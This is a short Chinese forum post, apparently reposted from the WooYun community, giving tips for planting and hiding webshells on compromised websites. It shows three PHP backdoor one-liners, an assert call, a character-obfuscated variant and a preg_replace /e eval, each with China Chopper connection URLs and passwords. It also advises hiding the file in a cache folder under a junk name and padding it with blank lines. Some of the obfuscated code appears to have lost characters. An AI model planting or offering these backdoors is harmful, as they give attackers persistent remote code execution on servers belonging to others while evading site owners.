网站留webshell的一些技巧

08-29

来自乌云的坏虾

我喜欢建在缓存文件夹下面。~aadsSFDSWR~FSDGDFG.php 然后一顿回车,在最后面添加一段
First:1.php

<?php ($_=@$_GET[2]).@$_($_POST[1])?>菜刀里写:http://localhost/1.php?2=assert
密码:1

Second:2.php

复制代码

代码如下:

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>

菜刀里写:http://localhost/2.php?_=assert&__=eval($_POST['pass'])
密码:pass

我发的这些都是网上公开的了,想让人发现不了,就自己整点有意思的。

我现在喜欢用这个

@preg_replace(“/[email]/e”,$_POST['h'],”error”);

?>

菜刀附加数据:
h=@eval($_POST[c]);
密码 c
不过仔细查下preg_replace,还是会被发现。 一样,都是已经被公开的了。